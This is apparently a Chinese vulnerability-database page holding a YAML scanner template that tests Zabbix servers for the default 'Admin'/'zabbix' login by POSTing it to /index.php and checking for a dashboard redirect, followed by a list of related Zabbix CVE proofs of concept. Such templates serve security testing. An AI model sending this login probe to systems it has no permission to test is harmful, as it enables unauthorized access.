zabbix-default-password: Zabbix Default Password

漏洞描述

PoC代码[已公开]

id: zabbix-default-password

info:
  name: Zabbix Default Password
  author: fuzz7j(https://github.com/fuzz7j)
  severity: high
  verified: true
  description: |-
    Zabbix default admin credentials were discovered.
  reference:
    - https://openbaton.github.io/documentation/zabbix-server-configuration-3.0/
  tags: zabbix,default-login
  created: 2023/06/24

rules:
  r0:
    request:
      method: POST
      path: /index.php
      body: name=Admin&password=zabbix&autologin=1&enter=Sign+in
    expression: response.status == 302 && response.headers["location"].contains("zabbix.php?action=dashboard.view")
expression: r0()

相关漏洞推荐

• Zabbix /api_jsonrpc.php SQL 注入漏洞（CVE-2024-36465）
• POC CVE-2024-22120: Zabbix Server - Time-Based Blind SQL injection
• POC CVE-2016-10134: Zabbix - SQL Injection
• POC CVE-2019-17382: Zabbix <=4.4 - Authentication Bypass
• POC CVE-2022-23131: Zabbix - SAML SSO Authentication Bypass
• POC CVE-2022-23134: Zabbix Setup Configuration Authentication Bypass
• POC CVE-2022-26148: Grafana & Zabbix Integration - Credentials Disclosure
• POC CVE-2016-10134: Zabbix SQL Injection Vulnerability
• POC CVE-2022-23131: Zabbix - SAML SSO Authentication Bypass
• POC CVE-2022-23134: Zabbix Setup Configuration Authentication Bypass
• POC CVE-2022-26148: Grafana & Zabbix Integration - Credentials Disclosure
• POC zabbix-authentication-bypass: Zabbix authentication Bypass
• POC zabbix-dashboards-access: Zabbix Dashboards Access